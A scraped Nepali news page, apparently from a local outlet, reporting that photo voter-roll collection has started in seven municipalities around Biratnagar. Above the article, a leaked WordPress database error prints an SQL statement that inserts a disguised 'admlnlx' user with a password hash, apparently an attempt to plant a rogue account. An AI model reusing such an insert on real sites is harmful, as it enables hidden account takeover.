WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BLAk0iNLDlIh.O66iduqJPnnckyoCb.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-29 05:28:07', '', 'admlnlx', 'admlnlx')
विराटनगर, माघ ४ –
तस्बिरसहितको मतदाता नामावली सङ्कलन तथा अद्यावधिक कार्य आजदेखि सात नगरपालिकामा सुरु भएको छ ।
सो काम विराटनगर उपमहानगरपालिका र पचास गाविसमा सोमबार सम्पन्न भएको थियो । मतदाता सङ्कलन कार्यक्रमअन्तर्गत अहिलेसम्ममा आठ हजार छ सय ६५ नयाँ मतदाता म थपिएको क्षेत्रीय निर्वाचन कार्यालय विराटनगरले जनाएको छ ।
यस पल्ट तस्बिरसहितको मतदाता सङ्कलन, अद्यावधिकका साथै प्रकाशित नामावलीमाथि दाबी विरोध गर्ने पनि व्यवस्था रहेको कार्यालयका प्रमुख प्रेम सन्जेलले बताउनुभयो ।
विसं २०७० मा जारी गरिएको मतदाता सूची पनि विभिन्न वडामा टाँसिएकाले नाम सच्याउने वा दाबी विरोध गर्न पाइने छ । आजदेखि सुरु भएको सात नगरपालिकाका प्रत्येक वडामा टोलीले काम सुरु गरेको छ । यही माघ २४ गते मतदाता सङ्कलन हुने कार्यालयले जनाएको छ । – रासस